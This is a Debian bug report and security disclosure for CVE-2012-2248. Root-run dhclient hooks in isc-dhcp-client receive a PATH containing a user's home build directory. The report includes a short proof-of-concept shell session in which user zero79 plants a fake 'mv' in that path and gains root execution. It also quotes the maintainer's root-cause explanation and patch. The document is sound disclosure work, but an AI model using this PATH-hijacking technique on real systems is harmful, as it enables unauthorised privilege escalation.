[pkg-dhcp-devel] Bug#690532: CVE-2012-2248: backdoor for user "zero79" due to dhclient’s hook $PATH

Michael Stapelberg stapelberg at debian.org
Mon Oct 15 09:31:40 UTC 2012 

Package: isc-dhcp-client
Version: 4.2.2.dfsg.1-5
Severity: critical
Tags: security patch


While debugging another issue, Mithrandir, mbiebl and I stumbled upon
the following:

All hooks in /etc/dhcp/dhclient-enter-hooks.d, such as "samba" when the
samba package is installed, are called with a PATH environment variable
containing this:

PATH=/home/zero79/source/git/isc-dhcp/debian/tmp/usr/sbin:/sbin:/bin:/usr/sbin:/usr/bin

Since hooks (at least "samba") can call arbitrary commands and are
running as uid 0 (root), this poses a security issue when the following
assumptions are true:

1. The system you want to exploit has samba installed (or any other
   package which comes with a dhclient-enter-hook).
2. The attacker has the possibility of obtaining the username "zero79"
   and thus can create executable files in
   /home/zero79/source/git/isc-dhcp/debian/tmp/usr/sbin
3. The DHCP hook needs to be called to trigger the exploit, which
   happens at least on system start or after /etc/init.d/networking
   restart, possibly also when just renewing the dhcp-lease
   (unverified).

Here is a demonstration of this issue:

zero79 at squeezevm:~$ id -a
uid=1001(zero79) gid=1001(zero79) groups=1001(zero79)
zero79 at squeezevm:~$ mkdir -p source/git/isc-dhcp/debian/tmp/usr/sbin
zero79 at squeezevm:~$ cat >source/git/isc-dhcp/debian/tmp/usr/sbin/mv <<'EOF'
#!/bin/sh
echo "my script is run as: $(whoami) $(id -a)" > /tmp/exploited
EOF
zero79 at squeezevm:~$ chmod +x source/git/isc-dhcp/debian/tmp/usr/sbin/mv
root at squeezevm:~# /etc/init.d/networking restart
Restarting networking (via systemctl): networking.service.
root at squeezevm:~# ls -hltr /tmp
total 8.0K
-rw-r--r-- 1 root root 966 Oct 14 13:42 samba
-rw-r--r-- 1 root root  65 Oct 14 14:02 exploited
root at squeezevm:~# cat /tmp/exploited 
my script is run as: root uid=0(root) gid=0(root) groups=0(root)

At this point, "zero79" has root access to the system.

Raphael Geissert has resolved this issue in a timely fashion, his
statement follows and his patch is attached:

 The insertion of that path does not appear to be malicious. Rather, it 
 appears to be a mistake in debian/rules as --prefix is set to 
 $(pwd)/debian/tmp/, instead of setting DESTDIR when calling make 
 install. client/Makefile.am defines CLIENT_PATH to 
 "PATH=$(sbindir):/sbin:/bin:/usr/sbin:/usr/bin", which is later injected 
 into the env.

 Due to what appears to be a bug in squeeze's Makefile.am, squeeze is not 
 affected.

 Attached patch fixes the problem.

 Since I've already built the package for wheezy, I'm going to upload it. 

-- System Information:
Debian Release: wheezy/sid
  APT prefers testing
  APT policy: (990, 'testing')
Architecture: amd64 (x86_64)
Foreign Architectures: armel
i386

Kernel: Linux 3.5.0 (SMP w/8 CPU cores)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages isc-dhcp-client depends on:
ii  debianutils      4.3.2
ii  iproute          20120521-3
ii  isc-dhcp-common  4.2.2.dfsg.1-5
ii  libc6            2.13-35

isc-dhcp-client recommends no packages.

Versions of packages isc-dhcp-client suggests:
pn  avahi-autoipd  <none>
pn  resolvconf     <none>

-- no debconf information
-------------- next part --------------
A non-text attachment was scrubbed...
Name: CVE-2012-2248.patch
Type: text/x-diff
Size: 1082 bytes
Desc: not available
URL: <http://lists.alioth.debian.org/pipermail/pkg-dhcp-devel/attachments/20121015/000ec67f/attachment-0001.patch>

More information about the pkg-dhcp-devel mailing list